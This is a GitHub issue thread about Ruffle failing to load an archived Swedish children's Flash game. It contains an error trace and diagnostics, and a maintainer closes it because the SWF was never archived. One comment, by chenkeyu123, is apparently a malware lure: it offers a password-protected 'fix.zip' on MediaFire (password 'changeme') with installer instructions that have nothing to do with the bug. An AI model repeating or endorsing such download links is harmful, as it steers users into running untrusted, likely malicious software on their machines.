### ISSUE TITLE
Ruffle failed to load the Flash SWF file.

### ISSUE THREAD

**Issue by jonas9881** [ruffle-rs/ruffle#17689]
### Describe the bug

I can't see this page as it just shows a screen that something is wrong.

I would really like to see what this page looked like before, and would appreciate it if someone could fix the bug or whatever it is that is preventing Ruffle from displaying the page.
![Skärmbild (39530)](https://github.com/user-attachments/assets/0c4ac3ca-2602-4890-b402-0fdfb9bf7322)

It loads as if it were working but then it stops and the screen comes up with the text that it is not working, but it feels like the game is there but it is not displayed or can be played. Yes, it is not clear what is actually happening, but clearly it is not working as it should.

### Expected behavior

I hope that the page will load as it should, and show the content that has been on the website before.

### Content Location

https://web.archive.org/web/20030805065823/http://svt.se:80/bolibompa/version2/html/programledare/dagbok/frameset.html

### Affected platform

Online demo

### Operating system

Windows 11

### Browser

Google chrome

### Additional information

# Error Info
Error name: Error
Error message: Failed to fetch: http://svt.se/bolibompa/version2/swf/dagbok.swf?strURL1=/svt/road/Classic/department/564/jsp/Render.jsp&strURL2=/svt/road/Classic/department/562/jsp/Render.jsp&intDep=3543
Error stack:
```
Error: Failed to fetch: http://svt.se/bolibompa/version2/swf/dagbok.swf?strURL1=/svt/road/Classic/department/564/jsp/Render.jsp&strURL2=/svt/road/Classic/department/562/jsp/Render.jsp&intDep=3543
    at ft.displayRootMovieDownloadFailedMessage (https://web-static.archive.org/_static/js/ruffle/ruffle.js:2:381767)
    at https://web-static.archive.org/_static/js/ruffle/core.ruffle.67bc37f4e63c43ff9c64.js:1:7518
    at <ruffle_web::ui::WebUiBackend as ruffle_core::backend::ui::UiBackend>::display_root_movie_download_failed_message::h823ef5c443b6b226 (wasm://wasm/035cabca:wasm-function[12886]:0xa53c4c)
    at ruffle_core::loader::Loader::root_movie_loader::{{closure}}::h3d99367fb670b5df (wasm://wasm/035cabca:wasm-function[955]:0x344e02)
    at <ruffle_web::navigator::WebNavigatorBackend as ruffle_core::backend::navigator::NavigatorBackend>::spawn_future::{{closure}}::h5c663d37bec393c0 (wasm://wasm/035cabca:wasm-function[1264]:0x42cc07)
    at wasm_bindgen_futures::queue::Queue::new::{{closure}}::hf3d45b9fcb0286e9 (wasm://wasm/035cabca:wasm-function[3710]:0x771a26)
    at <dyn core::ops::function::FnMut<(A,)>+Output = R as wasm_bindgen::closure::WasmClosure>::describe::invoke::h4b99ccc6980aa0f1 (wasm://wasm/035cabca:wasm-function[11656]:0xa1f5c6)
    at closure5566 externref shim (wasm://wasm/035cabca:wasm-function[11973]:0xa2ad6a)
    at E (https://web-static.archive.org/_static/js/ruffle/core.ruffle.67bc37f4e63c43ff9c64.js:1:3204)
    at c (https://web-static.archive.org/_static/js/ruffle/core.ruffle.67bc37f4e63c43ff9c64.js:1:2503)
```

# Player Info
Allows script access: true
Renderer: wgpu
Adapter Backend: Gl
Adapter Name: "ANGLE (AMD, AMD Radeon(TM) Graphics (0x00001638) Direct3D11 vs_5_0 ps_5_0, D3D11)"
Adapter Device Type: Other
Adapter Driver Name: ""
Adapter Driver Info: ""
Enabled features: Features(TEXTURE_COMPRESSION_BC | TEXTURE_ADAPTER_SPECIFIC_FORMAT_FEATURES | PUSH_CONSTANTS | SHADER_UNUSED_VERTEX_OUTPUT)
Available features: Features(CLEAR_TEXTURE | MULTIVIEW)
Current limits: Limits { max_texture_dimension_1d: 16384, max_texture_dimension_2d: 16384, max_texture_dimension_3d: 2048, max_texture_array_layers: 256, max_bind_groups: 4, max_bindings_per_bind_group: 1000, max_dynamic_uniform_buffers_per_pipeline_layout: 8, max_dynamic_storage_buffers_per_pipeline_layout: 0, max_sampled_textures_per_shader_stage: 16, max_samplers_per_shader_stage: 16, max_storage_buffers_per_shader_stage: 0, max_storage_textures_per_shader_stage: 0, max_uniform_buffers_per_shader_stage: 11, max_uniform_buffer_binding_size: 16384, max_storage_buffer_binding_size: 0, max_vertex_buffers: 8, max_buffer_size: 268435456, max_vertex_attributes: 16, max_vertex_buffer_array_stride: 255, min_uniform_buffer_offset_alignment: 256, min_storage_buffer_offset_alignment: 256, max_inter_stage_shader_components: 31, max_compute_workgroup_storage_size: 0, max_compute_invocations_per_workgroup: 0, max_compute_workgroup_size_x: 0, max_compute_workgroup_size_y: 0, max_compute_workgroup_size_z: 0, max_compute_workgroups_per_dimension: 0, max_push_constant_size: 96, max_non_sampler_bindings: 1000000 }
Surface quality: high
Surface samples: 4
Surface size: Extent3d { width: 550, height: 400, depth_or_array_layers: 1 }

# Page Info
Page URL: https://web.archive.org/web/20030818155343fw_/http://svt.se/bolibompa/version2/content/game.jsp?game=dagbok
SWF URL: http://svt.se/bolibompa/version2/swf/dagbok.swf?strURL1=/svt/road/Classic/department/564/jsp/Render.jsp&strURL2=/svt/road/Classic/department/562/jsp/Render.jsp&intDep=3543

# Browser Info
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Platform: Win32
Has touch support: false

# Ruffle Info
Version: 0.1.0
Name: nightly 2024-01-08
Channel: nightly
Built: 2024-01-08T00:15:28.895Z
Commit: 47db84473a639c405289bb86ce238a83af574137
Is extension: false

# Metadata

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lord-McSweeney** [comment]
Unfortunately, it seems that the Wayback Machine did not save the required SWF file, so the game cannot load. Closing.
